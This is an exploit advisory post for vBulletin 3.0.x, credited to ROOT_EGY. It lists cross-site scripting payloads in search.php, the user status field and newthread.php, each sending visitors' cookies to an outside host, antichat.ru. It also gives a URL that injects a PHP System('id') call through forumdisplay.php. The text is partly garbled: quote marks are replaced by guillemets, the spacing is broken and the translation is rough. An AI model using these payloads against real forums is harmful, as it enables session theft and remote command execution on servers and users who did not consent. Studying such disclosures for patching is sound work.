# Title: vBulletin 3.0.0 XSS# Author: Discovered by ROOT_EGY# Version: vBulletin Version 3.0.0===============================================
WWW.sec-war.com
===============================================3.0.0- Introduction XSS scripts in the script search.php. In fact, a hole through a browser implemented.
Example: www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query =<script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie;</ script>3.0-3.0.4- implementation of commands in the script forumdisplay.php through incorrect handling of variables.
For example: www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS []=1& f =2& comma = ». System ('id').»
3.0.3-3.0.9 introduction XSS scripts in the Status field.
Way to change the status can only admins,for example, moderators. Is an example code sployta:<body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>3.0.9and3.5.4- introduction XSS scripts in parameter posthash scenario newthread.php.
Here primerchik:
www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s =& f =3& do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime ='% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl =1& disablesmilies =1& emailupdate =3& postpoll = yes & polloptions =1234& openclose =1& stickunstick =1& iconid =0===============================================
ROOT_EGYto connect: r0t@hotmail.es
===============================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.===============================================